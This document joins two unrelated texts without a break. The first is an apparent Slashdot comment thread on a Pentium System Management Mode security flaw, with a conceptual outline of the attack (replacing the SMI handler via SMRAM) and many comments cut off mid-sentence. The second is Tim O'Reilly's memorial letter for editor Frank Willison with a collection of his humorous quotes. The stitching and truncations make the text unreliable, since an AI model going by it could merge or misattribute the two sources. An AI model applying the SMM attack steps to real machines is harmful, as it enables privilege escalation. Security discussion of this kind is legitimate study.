FCW stands for Federal Computer Week, a trade rag that US gov't stooges use to figure out how to best waste our tax dollars of shiny boxes with blinky lights. Their topic headings include the buzzwords:
The anonymous submitter might do well to remain so. Scuttlemonkey, OTOH, may have to enter the witness protection program. He's getting as bad as Zonk.
RAM access? (Score:3, Insightful)
How is it that an unprivileged user can write to such a sensitive location in the first place?
Security Experts Untie! (Score:5, Funny)
Good Times (Score:5, Funny)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
Re:Good Times (Score:2)
I think Commodore beat everyone up in terms of being ahead of time...try 1977! [6502.org]
Re:Good Times (Score:2)
Well, "hardware attacks" existed before too. There were some that would send your screen a refresh rate it couldn't handle, and it'd be destroyed (this is back in the text-mode days). Of newer things, some viruses would overwrite the BIOS, which I believe required reflashing in laptops which didn't have a ROM copy to reset to. Th
Re:Good Times (Score:5, Insightful)
The watershed for me, will always be the IE images exploits, where a malicious website could run code, simply by your browser attemtping to download a carefully crafted image file.
There I was, for years, telling people; "There's no way you can get a virus by just looking at an picture on the internet". Boy was I wrong.
Bottom line, not matter what you pronounce impossible through software, invariably, somewhere out there, there exists a bug to accomplish just that.
Headbanger Virus (Score:3, Informative)
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked
Re:Headbanger Virus (Score:2)
There was on that overwrote the park command so it didn't actually park the heads.
There was an Apple Virus for the APPLE IIc(I think, maybe an earlier model) that changed where the heads read the disk. This trick was also a great way to hide data.
There have been a coupl PC virus that wrote to 13. Another that overwrote the MBR.
Now they are just inconvienant.
Re:Headbanger Virus (Score:2)
I looked into the possibility of using "dead space" (space left at the end of programs and other fixed-length files that canNOT be used by anything else), because when you load a program, you actually load complete sectors. It would have been easy to attach something to the disk int
Sensationalist (Score:5, Funny)
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
In other news... (Score:5, Funny)
Seriously, if they have access then you are screwed anyways...
- Andrew
Heh (Score:2)
Not being a retard still work, though? Right? (Score:4, Insightful)
Re:Not being a retard still work, though? Right? (Score:2)
If by firewall, you mean one made of masonry or asbestos, yes.
How do you even get it to overheat to begin with? (Score:2)
I heard, act of God includes "stupidity".
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Well I generally like to compliment it on how pretty it's power on indicator is.
Then I might buy it something small, superfluous and pretty like a tennis bracelet or an X800 Radeon.
After that I start gently caressing it's biometric module.
That generally gets it pretty hot...
The devil is in the details (Score:5, Insightful)
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
Not Very Long Lived... (Score:2)
Re:Not Very Long Lived... (Score:2)
What Microsoft said... (paraphased) (Score:2)
Good thing macs aren't vulnerable. (Score:5, Funny)
A few more details (Score:5, Informative)
Re:A few more details (Score:5, Informative)
Linux and *BSD have a
/dev/mem device interface for accessing physical memory from user space. Usually, this device only allows access from a priviledged user:
Using
/dev/mem, it should be possible to access the address range assigned to system management RAM. However, the CPU has a Model-Specific Register (MSR) for enabling and disabling accesses to SM RAM. The instructions that are used to read and write MSRs (RDMSR and WRMSR) must be executed from ring-0 (kernel level) or else a GPF occurs. However, the Linux kernel can be configured to provide a user level interface to MSRs via:
Again, you'll probably need root priviledges to access the device.
Re:A few more details (Score:2)
Who says the system management ram is accessible by MSRs?
Seems like there isn't enough on-die space to save the entire state of the O/S, and MSR writing is painfully slow, so it wouldn't have time to dump everything INSIDE the core before triggering thermal protection.
More details? Anyone? Anyone?
exploit schmexploit (Score:2)
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Semi Permanent Backdoor? (Score:3, Insightful)
Or am I confused?
A "1" (Score:2)
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to
UNIVAC had similar vulnerability in checkpoint (Score:4, Interesting)
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPU's out of vacuum tubes.
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
I'm Safe (Score:2, Funny)
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
i heard about this! (Score:2)
Recommended work around (Score:2)
All Pentiums also vulnerable to DoS (Score:5, Funny)
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Next James Bon movie script excerpt: (Score:2)
evil hacker spotted... (Score:2)
film at 11
Better article: no FUD-OpenBSD demo-Theo comment (Score:4, Informative)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high level technical and then end with pointing out a principal that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes, one of those modes is known as Protected mode, other known as System Mgmt Mode. When your OS is running, your in Protected mode and this is how much of the security is performed and you'll hear of ring0 and ring3. Just know that your in-world universe is in protected mode.
System Management Mode (SMM) is used so that when there is something external to your OS world like say a thermal condition that needs to communicate some message, the CPU saves all its protected mode state out, does all this SMM stuff and then return to its regular scheduled program in protected mode.
There are details that evolve registry addresses and very low level operations but for the most part, a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
In the wider picture: works on most systems. Turns out that Linux and the *BSD's will fall victim to this attack strategy, however, Windows XP is not known to be exploitable because of a few system calls that are not present and more importantly a certain memory range in protected mode is not shared addresses to SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OPENBSD issue and said he and the team have known about it for a year. They are between a rock and a hard-place because Xserver is really the core of the problem. It has too much damn access to regesters and is in the most unfortunate address space in protected mode because when in SMM, what is in that address range can be used to exploit.
Solution is for Xserver people to abstract sufficiently so that the kernel can have more governance on the Xservers logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm it has been created, then it is also the case that the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created a incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, that no one in our world get control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
Its late and I have been blogging way too much today I am certain that my mental packet loss is abnormally high. I'll return to this in-game out-game concepts later in another blog entry, when I am less sleep deprived.
--tk
Not really an exploit (Score:3, Insightful)
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that
Too much hassle (Score:2)
Works just as fine.
reminds me attacking VM's via physical memory... (Score:2)
Yea, it was
This guy shouldn't be allowed to write... (Score:2)
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit beh
Concern (Score:2)
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel
Re:FUD? (Score:2)
Re:FUD? (Score:5, Insightful)
When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity,
Ok, fine.
Every computer that runs on x86 chip architecture may be vulnerable to this attack
Wait. How did we get here?
Let's go through this, again. Intel Pentium 4s are hot. No surprise there. They enter special modes when overheating that may introduce a security vulnerability. Fine. How does this cross over to AMD and Via chips again? AMD and Via processors don't have special modes like that. If system heat becomes critical they will simply shut the system down flat out. On a Pentium 4, overheating is not entirely unexpected, particularly on the high edge of the clock speeds. On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
So, how are all x86 chips vulnerable, exactly? (Incidentally, between this and this [daemonology.net], AMD is really looking to be a much safer deal, not to mention faster, cooler, more power efficient, etc.)
Re:FUD? (Score:3, Informative)
You are a little off. What a P4 does is "speed stepping" where if it is overheating it will down the clock and avoid areas on the chip that are the hottest, if it gets too hot it will shut down completely. This is desi
Re:FUD? (Score:2)
Yeah, because heatsinks coming unlatched all by themselves and falling off has been shown to be a common occurence.
Re:FUD? (Score:3, Interesting)
It happened to my wife's computer. The case is behind her desk, so I'm pretty sure nobody was picking it up and dropping it. One day it started spontaneously turning off after only a few minutes of use. After a little frustration at not even being able to complete any diagnostics on my CD, I finally pulled the desk out and opened the case up. I found the heatsick hanging from one peg, and the
Re:FUD? (Score:2)
Years ago I scored myself an Athlon 700 which was thrown out. When I got it home, guess what... heatsink had become unlatched and fell off enough to loose contact with the CPU. I fixed the dodgy latch hooks and it's been great for the past 4 years or so.
The person who threw it out was probably fed up with the few minutes of uptime they could get. ; )
Re:FUD? (Score:2)
Re:FUD? (Score:3, Informative)
AMD added this feature in the Athlon XP (maybe not th
Re:FUD? (Score:2)
FYI (Score:2)
New AMD (Sempron 64/Athlon 64/Athlon X2 64, Turion) all have "Cool N' Quiet" built in which throttles the chip down to speeds as low as 1Ghz (even lower on Turions I think) when idle. I have a dual core athlon system now, and my chip sits at 1Ghz/1
Re:FYI (Score:2)
Are you sure it was motherboard makers and not Microsoft with Windows?
Re:FUD? (Score:2)
Re:FUD? (Score:2)
So every now and then the CPU fan would crap. This was only and AMD K6-2 500Mhz chip but when that baby got hot, Windows 2K would BSOD like crazy. That was my cue to go out and buy another fan for $5.00. Hey, they lasted a year or so each so no big deal.
So that's how AMD chips respond to overheat, at least in my experience.
Re:FUD? (Score:2)
It dumps heat quite well. And I do have a job,very nice one in fact. And the ad hominem attack wasn't very nice. I'm going to have to tell your momma.
AMD overheat (Score:2)
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticably when run in a server
Athon XP 2500+ - Holy-freakin' he
Re:FUD? (Score:2)
FUD? Judge for yourself. (Score:2)
So, here's a link to the actual PowerPoint presentation [cansecwest.com]. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security enginee
Re:FUD? (Score:2)
Naw, AMD chips don't enter hardware interrupt mode when they overheat, they violently explode:
e .php [azfar.name.my].
Re:Isn't it about time (Score:2)
Fear the consequences of creating Pentium chips? I'm no fan of Intel, myself, but that seems a bit extreme.
Re:Isn't it about time (Score:2)
parent is obviously scared by computers and computer crime. news flash, all computers have some sort of security problem. you cant lock people up and think that will solve all the computer security problems so you can sleep well at night. people who are clueless about computers advocate such hard line policies. its ignorance and fear and wanting to do something -anything- no matter how completely irrelevant and meaningless that action is.
Re:Isn't it about time (Score:2)
Also, many of the people doing these things are stupid kids. Come on, $25 for a 10,000 node botnet? That's someone who wants money to play whatever online game is hot these days, not someone
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
"No sprinkles. For every sprinkle I find, I shall kill you."
Re:Remember the F00F bug? (Score:2)
Uh, no (Score:2)
Re:But how? (Score:2, Interesting)
SMM is present on many x86 processors and dates back to the days of NeXGen and Cyrix and 486s. It is basically a real-like mode of the x86 processor where certain hardware emulation type operations are performed.
The SMM software usually resides at A000:0000 which is normally video memory in a PC. However, in SMM the address decoder actually mapps those addresses to physical RAM and runs the SMM k
Re:I think Im covered (Score:2)
Re:Wait wait wait (Score:3, Interesting)
Come to think of it, I had an old HP that integrated a fan controller on the motherboard. It might have been hardware-only, though.
Seems like a lot of hacking for a small payoff, but I think the path is there for some systems.
Re:Wait wait wait (Score:2)
It's possible to kill the daemon or boot up without launching it, but in the event of this, the hardware has a "fail s
ummm (Score:2)
|
http://slashdot.org/story/06/04/11/1655257/pentium-computers-vulnerable-to-attack?sdsrc=prevbtmprev
|
CC-MAIN-2014-52
|
refinedweb
| 4,732
| 62.27
|
Dear Customers and Friends,
O'Reilly editor in chief Frank Willison suffered a heart attack and died the morning of July 30th. This is a tragedy.
Of all of us at O'Reilly, Frank is the one we'd most have imagined growing old and grandfatherly, dispensing to successive generations the wisdom, humor and caring that he shared with all of us. He is (I use the present tense deliberately) one of those people who is an inspiration to us all, someone who demonstrates convincingly how to be a wonderful human being.
In times like these, I find comfort in a passage from Wallace Stevens:.
The passing of our heroes (and Frank was one of my heroes and mentors, as I'm sure he was for so many of you as well) reinforces in us the knowledge that what matters is not the time or manner of our passing, but the way we lived. Frank lived in a way we would all be proud to live; I'm sure he continues on to his next adventure with the same light and curious touch.
We will all miss Frank very painfully in the days, weeks, months, and years to come. But what he gave to each of us will remain as part of the treasure each of us stores up in our life, and hopefully passes on to those around us, as Frank was so ready to do.
In parting, I'd like to share two things with you. The first is a collection of fragments from Frank's emails and columns. His writing was anticipated and collected by O'Reilly employees because of the wit, wisdom, humor, and humanity he wrote with. O'Reilly PR director Lisa Mann kept the file these come from. Around the company the file was known as "The Best of Frank."
Secondly, O'Reilly CTO Jon Orwant put together a memorial Web site where people can share their favorite memories of Frank. I encourage you to do so if you've got something to share.
Go well, Frank. --Tim
The Best of Frank
On MP3 Filesharing
Kevin Bingham wrote: "Hold on. Haven't I read somewhere that a large percentage of Napsterites (can I say that?) are over 30?"
Frank wrote: "You're thinking of nappers. I listen to loud music all the time: Tower of Power, Little Feat, Van Morrison, and Paul Butterfield all sound great loud. I like that boom boom boom boom--it provides sensation for the lower half of my body in a healthful and socially acceptable form. But the boom boom boom boom has to be crisp; it can't be muddy (that is, I don't want boowhoom boowhoom). If Rocco Prestia is going to play 400 bass notes a second, I want to hear each one. MP3 doesn't quite deliver yet."
On Technothrillers
"On the airplane trip out, I began reading Acts of the Apostles, by John F.X. Sundman.."
On the Other Hand...
"As for the larger question of whether our books are suitable for learning how to program: I was first going to contradict what 'the publisher' said in his article, but then I noticed that he was quoting me. I quickly changed my strategy."
On the French
."
Late at Night
"Late at night, in the privacy of my home, while my family sleeps peacefully unawares, I make lists of weak areas for us. I define them differently each time: areas where we don't publish and ought to; topics for which we've signed many different authors but never got a completed book; areas where we have conspicuous and obvious gaps in an otherwise admirable program. Mostly, though, I use the definition you suggest: books that need to be updated and haven't been. I furrow my brow for some minutes; then I rip up the list, feed it to the dog, and go back to bed."
On Management
"It's difficult to exhort employees to Discipline and Self-Control when you know they call you Bowlhead behind your back."
On Saab Drivers
."
Bicycles That Pass in the Night
."
On Investing
"I believe that investing is, basically, morally wrong; but Computer Aided Investing is so wrong that it bears the personal stamp of Satan."
And More on Investing
"This sort of superficial, short-term success is common to those who've cut a bargain with Old Nick. Look at Ted Turner, Ted Bundy, and Faust. Ultimately, though, you end up married to Jane Fonda and wondering where you've gone wrong. But by then it's Too Late. Invest in some asbestos sandals.
"Let This Be a Lesson to You."
Man vs. Squirrel
."
On Gadgets
"But will a PDA have sufficient self-esteem to feel okay about asking directions? Will cell phones have the social skills necessary to rebuff the bogus location requests of a randy PDA? Will there be wireless access to Miss Manners? Why do I feel that, when devices are able to talk to each other, they'll prefer that activity to taking care of *my* needs? Who's paying the bills here?"
On Passive-Aggressive Behavior
"Part of the problem is passive-aggressive behavior, my pet peeve and bête noire, and I don't like it either. Everyone should get off their high horse, particularly if that horse is my bête noire. We all have pressures on us, and nobody's pressure is more important than anyone else's."
On Cakes and Diets
"Did everyone note that Hungry Minds controls both Betty Crocker and Weight Watchers Press? It's not only the minds which hunger; you can have your cake, but you can't eat it."
On What Makes a Good Proposal
"You have to like a proposal that quotes populist poetry from the Soul of Scotland."
On What Makes a Bad Proposal
"They opened up the Nutshell, and lo, there was no nutmeat. So they said, 'This too will pass.' And that's what we should do on this one: pass."
"Nobody has replied to this proposal. I will offer a comment: I would rather drink muddy water and sleep in a holler log."
On Alliteration in Titles
"We are not working on a Programming Perl for the Palm Pilot book: too many initial Ps. It would make for an unsanitary cover over time."
On Relatively Suited Authors
"No faroukhin' way are we going to hire a cowardly weakling who did the pusillanimous dumbass website at! Especially not one who uses so many exclamation points! Let him try to write a book! I'll snap his useless jockstrap!"
"Let's pass on this fellow. He's only 'relatively suited' anyway, he says."
On Age
"I may well be a fartist, Nat, but I am not old."
On Being Sued
"I get no respect. I can't even be threatened by normal people. Check out. They sell books like Sex Diary of a Metaphysician and Amazing Dope Tales. Why can't I be threatened by a decent professional publisher?
"I think you read a page, rip it out, fill it with grass, roll it up, and smoke it. It's a 2-for-1 sale."
On Lending Books
."
On Grammar and Copyeditors
"Nobody knows the language like those who correct others' peccadilo's, uh, peckadilloes, mmm, peccadildos, aah, forget it: mistakes all day."
On Suburbs
"How do these people know what's going on in their homes and neighborhoods all day? For all they know, their houses are being used by drug dealers, spies, or clever urban raccoons. Delivery men might notice such unauthorized activity I would support legislation requiring some percentage of the residents of a neighborhood to stay home. People might remember why they have homes in the first place."
On Dry Cleaning
"I would certainly also support a return to the practice of wearing clean clothes to work and out in public. I hope that dry-cleaning experiences a renaissance and the era of Ratso Rizzo Casual Days at work is coming to end. If cleanliness is next to godliness, then dry-cleaning, after all, is practically a sacrament."
On Compliments
"Thank you for your strong endorsement of our publishing plans. We often say such things to ourselves, but when we hear our customers say them, we're more certain that we're not delusional."
On The End of the World, and Yes, It's Nigh
"Partway through Elliotte Rusty Harold's talk about namespaces, I realized where this relentless drive toward abstraction was taking us. Every new level of abstraction draws the computer-based world closer to the concepts we talk about in the real world. We've moved from waves to bits to data to information to infosets to application objects. As this process continues, some ambitious Comp Sci graduate student will realize that somebody already created the tree structure mapping the highest level of reality. That person was, of course, G. W. F. Hegel. Hegel's dialectic led him to create a map of reality that, at the top of the tree structure, divided everything into either the material or the spiritual realm. That dichotomy was resolved in God, and, my friends, that's about as far as you can go.
"That ambitious Comp Sci grad student, eager to get his Ph.D. and begin making real money, will create The Two Final Infosets: MatterML and SpiritML. Then, late one night, as rain falls in torrents and lightning flashes outside his laboratory windows, he'll run XSLT to transform the material world to the spiritual world. We'll be gone. The last material object on earth will be that graduate student's open copy of XML in a Nutshell. It makes an editor in chief proud, in a perverse kind of way."
On First Person Singular Possessive Pronouns
?"
On Italy
"What is it about Linux internals and Italy? I thought it was wine, women, and song over there; now it's kernel, stack, and drivers. Is tomorrow's Giancarlo Giannini romancing a motherboard today?"
On Adult Language
"Curl ain't no Flash, at least not yet. (I never thought I would as an adult write a phrase like 'Curl ain't no Flash.' What could it possibly mean?)"
On Perl Evangelists
"One word of warning: if you meet a bunch of Perl programmers on the bus or something, don't look them in the eye. They've been known to try to convert the young into Perl monks."
On Parody
"This particular ruling is especially disheartening because Gone with the Wind is, of all books, most deserving of a parody. Its unbelievable tale of Reconstruction in the South has done more harm than people know. . . . Parody plays an important role in the development and understanding of a culture. Making its expression less important than the property rights of the estate of a dead author is not just an intellectual property problem: It's the death of our culture and the beginning of the end of democracy and free speech. And I don't like Clark Gable, either."
On Monopolists
"I'd like to erect a big arena in the Silicon Valley where McNealy and Ballmer and Gates and Ellison and Case can don gladiator (or gladiolus) gear and just hammer each other the livelong day. There's not one of them you can trust, either advocating an idea or refuting the ideas of others. While McNealy criticizes Microsoft, I guarantee he's figuring out how to do something similar to steal the same money. Nothing is worse that a monopolist except for a frustrated, failed monopolist. A pox on the lot of them."
On Summer Vacations
'internship' and 'internment camp' both start with 'intern.'"!"
On Birthday Celebrations
"These birthdays are unacceptable. It is corporate policy that all employee birthdays fall on weekends each year, with no more than one birthday per day. Please fill out the Employee Birthday Request Form and submit it to your manager by April 1 of the preceding year. No unauthorized birthdays are to be celebrated."
On Hardware Demos
"People who believe demos probably go to Fred Astaire/Ginger Rogers movies and say, 'Golly, look how well they dance together, and they just met!'"
On Desk Fountains as Xmas Gifts
"They were meant to reduce stress, but I think they make people want to take a leak all the time. What could be more stressful than that?"
On New Year's Driving
"My father, a man who enjoyed the Pleasures of Drink, called New Year's Eve 'Amateur Night' and taught us all to stay off the road, preferably on the second floor of a secure dwelling, from the 30th of December through the 1st of January. I'll be breaking that rule this year, and in a rental vehicle to boot. Light a candle for me, and with the help of God, I'll see all of you in 1996."
On a 'New' Fenway Park
"I've just voted. Public funding is currently winning, almost certainly because of heavily subsidized voting by a foul coalition of out-of-state bankers, cynical real estate moguls, and partisan building trade organizations. True baseball fans, unmoved by greed, must vote to counter this pack of wolves.
"Of course, whichever way you vote is your business. Not trying to influence in any way, etc., etc.
"Fenway Frank"
On Water Quality
>Fire Hydrant Testing - April 29-May 10: Inman Square and Sherman Street
>areas. Testing may disturb sediment and cause water to appear rust
>colored. It is suggested that residents check water before doing
>laundry, as discolored water may cause stains. Call Cambridge Fire
>Department between 8am and 8:45am at 349-4021 for more info.
"These guys. Disturbing sediment does not make water 'appear rust colored.' That's a double obfuscation. It makes water rusty. The water *is* rust-colored (obfuscationtion #1) and it is that color because it contains *actual rust* (obfuscation #2).
"The O'Reilly book on the subject (Using and Managing Cambridge Water) would have said:
"Don't use the water for 24 hours after Cambridge tests fire hydrants in your neighborhood. If you do, you will get rust in your teeth and on your nice Gap clothes. As a workaround, drink bottled water and do your laundry in Brighton."
On Schedules
"I had a dream last night.
"We were all on an island. Everything on that island was collapsing, and we had to abandon it immediately. We had a plane to take us to the mainland, but it couldn't land, and we had no parachutes.
"My plan was for the plane to fly slowly and as low as possible, and we would all jump out.
"As we took off, to cheer everyone up, I said, 'Don't worry; we'll redo the master schedule after we see who survives.'"
On Claymation Christmas
"Not in my most cynical, sarcastic, misanthropic moment could I have perversely imagined suggesting a claymation version of the Gospel. Nathaniel West would never have written 'Day of the Locust'.
"And as if the idea weren't cynical enough, they've cast Ralph Filenes as Jesus' voice and Miranda Richardson as Mary Magdalene.
"There are not enough edible roots on the planet to allow these malefactors to pay their debt to society."
On Deepak Chopra
"This feeble, bourgeois paganism is the worst. Who would have thought that people would want paganism only if the fun is removed? No running through the woods naked, no polyrhythmic drumming. No selling your soul for eternal life; you'll get eternal life simply by living healthily. If you don't ever do anything wrong, you won't die. Sure.
"Keep Chopra; I'll take Beelzebub."
On Meg
"Don't be fooled by my boyish good looks. As of yesterday, I have been happily married (to *one* woman!) (uh, Meg, that is) for twenty years.
"So I'm taking tomorrow off to reacquaint her with me."
On Dom's Departure
"Dom, the one essential man we hoped would leave us never
Is going to the golden State Where People Say "Whatever."
Nursemaid to the editors, the one who brought relief, Dom
Charmed us all and transformed lowly Cambridge to his fiefdom.
"Dom, it's heartless now to leave us suff'ring without pity,
[ ... offending line elided; don't worry, it rhymes ... ]
Champion of compromise, emollients, and barter, Dom
Saved Production from the dreaded consequence of martyrdom.
"Though he wished it otherwise, his calendars were humor,
Mixing lies with speculation, guesstimates and rumor.
Sales asked, "Where are those books you promised us before, Dom?"
Dom replies, "I may have brought you pain, but never boredom."
"Going now to Walnut Creek (We don't know where that is, Dom),
We will miss his cheery smile, friendliness and wisdom.
If we had to pick the one who was your biggest fan, Dom,
We could go around the room and pick someone at random."
On SETI
"So that's where all the intelligence went!
"If you hear from any good editors, let me know; I'll let them work remotely."
On "Animal House"
"This film is a seering, angry metaphorical exploration of societal dissolution brought about by the conflict between marginalized citizens and an oppressive central authority. And they throw jello, too.
"To help viewers develop strong identification with the oppressed class in this movie, the LAVA Tripartite Commission (Linda Mui, Valerie Quercia, and Frank Willison) urge all employees to wear togas* to this event. (Those familiar with the film will remember that a toga party represents a key turning point.) We have alerted Bed, Bath, and Bacchanalia to have plenty of sheets for sale in their Cambridge and Fenway stores. (Ms. Quercia recommends the purchase of a flat sheet. 'Fitted' in the context of bedsheets does not indicate a more flattering cut when worn.)
"* Togas, in O'Reilly parlance, are officially called 'business casual.'
"We're looking for a volunteer to teach toga-tying tomorrow. Let's not let accidents spoil office camaraderie."
On Ridding the Office of Mice
"Read the following Robert Burns poem loudly. It's universally hated in the small rodent community. The mouse will leave out of principle."!
On the Anarchist Cookbook
"I just went to Amazon to check up on The Anarchist Cookbook, having just mentioned it in a recent email to all of you. It was published in 1970 and was a very inflammatory document; it had a lot of cachet among radicals on campus, but it was a truly practical and therefore very scary manual of violent acts.
"I urge you to go the the Amazon page and read the author's poignant comments there. He says that he wrote the book in anger, at the age of 19 and in the midst of the Viet Nam War, and has come to regret it. He has tried several times to take the book out of print, but the original publisher (Lyle Stuart) and the publisher to which the book was then sold (Barricade Books, for crying out loud) have refused. As you'll be able to see by the comments, his book is favored now by people of the survivalist school, not his intention at all. It's a sad commentary; nobody should be plagued into his middle age by the crackpot ideas he espoused at 19."
Proposed Perl Book Titles
"Enough Perl Already!
"No Mas Perl
"Right-Brained Perl
"Painterly Perl"
On the New Yorker Magazine
"James Calamera told me that someone from the New Yorker wanted to talk to me about O'Reilly's publishing plans. I bought myself a tweed jacket with leather elbow patches, a bow tie, and cordovan Weejuns and called him. (His name was Pillsbury--you know he's old money.)"
On a Marketing Line for Java and XML (after we'd discovered a badly placed apostrophe on a blow-in card)
"Java and XML: Ask Someone Who Know's
"or
"Ask someone; who knows?
"I'll work on it some more."
On Learning Java
"Here is a sample from my upcoming book, a series of tutorial sonnets entitled Learn Java in 14 Lines!:
"Alas! I Married a Java Applet!
"My parents pled with ardent supplication,
That I should, if I marry, wed a lass.
But I chose you, a Java application,
And one, I blush to say, not from our class.
At first, you were both colorful and quick;
And on your speedy access I did dote.
Though on our Wedding Day we seemed to click,
O'er time, you grew increasingly... remote.
It seems that other users came to search you,
O'er all of us, your favors did you spread.
Though virtual, you knew not much of virtue,
Our love affair left hanging by a thread.
Romantic love with applets is most terrible.
I wish you weren't installed so network-shareable."
On .Net and Conflict of Interest
"This is a topic for which there is an existing principle: conflict of interest. 'Conflict of interest' does not require any overt act; it merely means that an entity has to choose between two actions which are in conflict with one another. A lawyer, for example, can't represent two defendants if defending one could hurt the case of the other. Slothful thinkers that we are, we've eroded that principle to say that everything is fine if there is no evidence of misdeeds; or, as the guy from ______ suggests, some outside agency certifies compliance with some privacy policy. I say, baloney; if a company wants both to protect your identity and make money from selling it, that company has an inherent conflict of interest. Microsoft cannot offer convincing identity protection because, as a vendor and a consumer of identity information, it has a conflict of interest.
"Anyone who gives private and financial information willingly to Microsoft should just cash out their accounts and play three-card monte instead; it will be more fun, their cash will last longer, and, after all their money is gone, those con artists will leave them alone."
On That Other Email Account
"Please excuse this email from a non-O'Reilly account. I keep this account for radical politics and pornography. And I had to come home before completing my email because--why was it again? Oh, right; this is where my family is."
On Waba
>We're not interested in a book on Waba by itself.
"I absolutely agree with Mike. Waba by itself has no rhythm. I am proposing a book combining a number of hot new technologies. It's called: Waba Java Wiki Tcl.
"That's a book you can chant in bars. Can't say it five times fast, no more beers for you."
On Aliens (re: Beyond Contact)
"Our extraterrestrial brothers and sisters (assuming biological reproduction) applaud (assuming they have hands) this development.
"One does worry about relying on an author who doesn't yet know how to pilot planes, but is doing so nevertheless. One hopes that God is his co-pilot, and He is paying attention."
On troff
"I love troff. It reminds me of runoff, which reminds me of my youth, when VMS was in flower and knowledge of EDT and runoff was all a lad needed to make a good living as a tech writer."
On Relaxing
"Take it easy, Bro."
On Hailstorm and Bill Paying
"Here's the other part of Hailstorm-type services that I don't get. I have cable, and when I don't pay my bill, they deny me TV shows. What if I don't pay my Microsoft bill? They have everything of mine: my contacts, calendar, documents, cellphone caller IDs, relationships... they have my business and my personal life. What if we have a dispute? How can I afford to argue with them?
"It's not even like when you don't pay your rent and they put your furniture on the sidewalk. They *keep* your furniture. If it's my data, I want it in my house on something I own.
"(Don't get the wrong idea; except for cable, I pay my bills. I know about the furniture thing from the movies.)"
On Email Over the Weekend
"A while ago, I suggested that we refrain from sending email over the weekend, so that people didn't feel that they had to check their email several times a day, every day, to stay abreast of current events. That didn't seem to catch on as an idea, so I suggested instead that we don't reply to email over the weekend, so that ideas didn't advance, issues didn't get resolved, and directions didn't get set until everyone had a chance to join in. That seems not to have caught everyone's imagination either.
"For those who have shown restraint over the weekend and regretted it, I now suggest that you participate as you feel is appropriate."
On Cloning Frank
>I'd describe him in more detail for you, but you likely
>already know him: just clone Frank Willison and make him a Republican.
"Impossible. That renders a null set."
On Health
